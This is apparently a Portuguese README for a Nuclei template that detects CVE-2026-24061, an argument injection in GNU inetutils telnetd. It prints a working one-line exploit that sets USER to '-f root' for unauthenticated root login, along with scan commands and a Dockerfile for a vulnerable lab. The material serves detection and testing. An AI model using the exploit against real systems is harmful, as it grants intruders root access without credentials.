
Modelo Nuclei para detetar CVE-2026-24061, uma injeção crítica de argumentos telnet no telnetd do GNU inetutils que permite acesso root não autenticado.
Template Nuclei para detecção da vulnerabilidade CVE-2026-24061 no GNU inetutils telnetd, que permite obter acesso root sem autenticação.
CVE-2026-24061 é uma vulnerabilidade crítica de injeção de argumentos no GNU inetutils telnetd, que permite a um atacante obter um shell root sem conhecer a senha.
%U foi adicionado ao telnetd: /usr/bin/login -p -h %h %?u{-f %u}{%U}
Vulnerabilidade: A variável de ambiente USER é transmitida através do protocolo telnet (RFC 1572 NEW-ENVIRON) e não é sanitizada antes da substituição no comando.
Exploração: O atacante define USER="-f root" ao conectar:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
A flag -f significa "skip authentication" → root sem senha 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Para testar, você pode subir um container Docker vulnerável:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Execução:
# Construir a imagem
docker build -t vuln-telnetd .
# Executar
docker run -d -p 2323:23 vuln-telnetd
# Verificar a vulnerabilidade
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Crítica
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Esta ferramenta destina-se apenas a testes de segurança legítimos em sistemas para os quais você tem permissão explícita.
O autor não se responsabiliza pelo uso indevido deste template.
Criado por Mr.Zapi